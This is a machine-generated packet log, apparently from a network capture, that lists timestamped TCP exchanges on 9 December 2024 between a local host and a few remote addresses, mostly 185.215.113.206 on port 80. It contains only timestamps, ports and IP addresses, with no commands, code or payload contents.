Dec 9, 2024 08:08:36.550632000 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.552520990 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.552644014 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.552689075 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.554692984 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.554735899 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.554789066 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.554833889 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.556853056 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.556986094 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.557044983 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.559065104 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.559119940 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.559134007 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.559170961 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.561125994 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.561252117 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.561311960 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.563299894 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.563342094 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.563463926 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.563498974 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.565437078 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.565612078 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.565669060 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.567605972 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.567656040 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.567718029 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.567759037 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.569736958 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.569852114 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.569899082 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.571903944 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.571962118 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.571962118 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.571995020 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.574044943 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.574110985 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.574153900 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.574193954 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.576167107 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.576818943 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.609832048 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.609883070 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.609949112 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.610466957 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.610528946 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.610559940 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.610610008 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.612608910 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.612621069 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.612672091 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.614748001 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.614793062 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.614861965 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.614902020 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.616947889 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.617063999 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.617105007 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.619067907 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.619121075 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.619153023 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.619206905 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.621197939 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.621239901 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.621284962 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.623368979 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.623414993 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.623436928 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.623473883 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.625526905 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.625598907 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.625672102 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.627665997 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.627748966 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.627774954 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.627811909 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.630187988 CET	80	49848	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:36.634910107 CET	443	49845	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:36.634989023 CET	49845	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:36.636684895 CET	49845	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:36.636694908 CET	443	49845	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:36.636926889 CET	443	49845	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:36.672238111 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.672388077 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.672435045 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.673079967 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.673119068 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.673154116 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.673194885 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.674837112 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.674854040 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.674876928 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.674894094 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.676515102 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.676628113 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.676670074 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.678229094 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.678281069 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.678338051 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.678379059 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.679888010 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.679932117 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.680017948 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.680056095 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.681526899 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.681570053 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.681657076 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.681699038 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.683166027 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.683221102 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.683279991 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.683330059 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.684794903 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.684835911 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.684878111 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.686372995 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.686418056 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.686491013 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.686532974 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.686665058 CET	49845	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:36.687926054 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.688067913 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.688085079 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.688098907 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.689470053 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.689517975 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.689539909 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.689578056 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.690999985 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.691037893 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.691109896 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.691145897 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.692513943 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.692588091 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.692634106 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.694010973 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.694065094 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.694101095 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.694381952 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.695501089 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.695543051 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.695574045 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.695620060 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.696953058 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.697093964 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.697127104 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.698410034 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.698472023 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.698538065 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.698576927 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.699867010 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.699903011 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.699933052 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.699968100 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.701291084 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.701400995 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.701456070 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.702721119 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.702769041 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.702938080 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.702980995 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.704176903 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.704269886 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.704315901 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.705609083 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.705688953 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.705780983 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.705830097 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.707070112 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.707129955 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.707173109 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.707215071 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.708492994 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.708544970 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.708612919 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.708808899 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.709959030 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.710012913 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.710062981 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.710122108 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.711417913 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.711463928 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.711524963 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.711626053 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.712891102 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.712935925 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.713015079 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.713053942 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.714278936 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.714318037 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.714394093 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.714435101 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.715897083 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.715974092 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.715996027 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.716048956 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.717152119 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.717195034 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.739512920 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.739603996 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.739661932 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.740127087 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.740358114 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.740403891 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.741364002 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.741430044 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.741465092 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.741504908 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.742640018 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.742659092 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.742690086 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.742713928 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.743875980 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.743985891 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.743997097 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.744033098 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.745134115 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.745203972 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.745225906 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.745265961 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.746381044 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.746444941 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.746503115 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.746568918 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.747725964 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.747776031 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.747832060 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.747864962 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.748905897 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.748967886 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.748996973 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.749105930 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.750161886 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.750216961 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.750332117 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.750385046 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.751485109 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.751537085 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.751569033 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.751606941 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.752660990 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.752779007 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.752830982 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.753962994 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.754024029 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.754087925 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.754123926 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.755250931 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.755299091 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.805006027 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.805017948 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.805062056 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.805150986 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.805162907 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.805192947 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.805207014 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.805213928 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.805331945 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.805368900 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.805517912 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.805553913 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.806569099 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.806610107 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.806766987 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.806802034 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.807934999 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.807945967 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.807980061 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.809047937 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.809117079 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.809215069 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.809254885 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.810234070 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.810283899 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.830295086 CET	49845	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:36.830318928 CET	49845	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:36.830395937 CET	443	49845	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:36.864289999 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.864339113 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.864353895 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.864394903 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.864804983 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.864855051 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.865021944 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.865067005 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.865099907 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.865142107 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.866190910 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.866244078 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.866292000 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.866333961 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.867294073 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.867336035 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.867393017 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.867435932 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.868359089 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.868405104 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.868482113 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.868695974 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.869455099 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.869502068 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.869582891 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.869714022 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.870527983 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.870661020 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.870702028 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.870722055 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.871674061 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.871809959 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.871831894 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.871855021 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.872704029 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.872833014 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.872843027 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.872879982 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.873754025 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.873819113 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.873837948 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.873889923 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.874798059 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.874864101 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.874901056 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.874948025 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.875827074 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.875871897 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.875931978 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.875972033 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.876883030 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.876928091 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.877012968 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.877059937 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.877852917 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.877897978 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.877957106 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.878002882 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.878866911 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.878912926 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.878971100 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.879015923 CET	49827	80	192.168.2.4	185.215.113.206
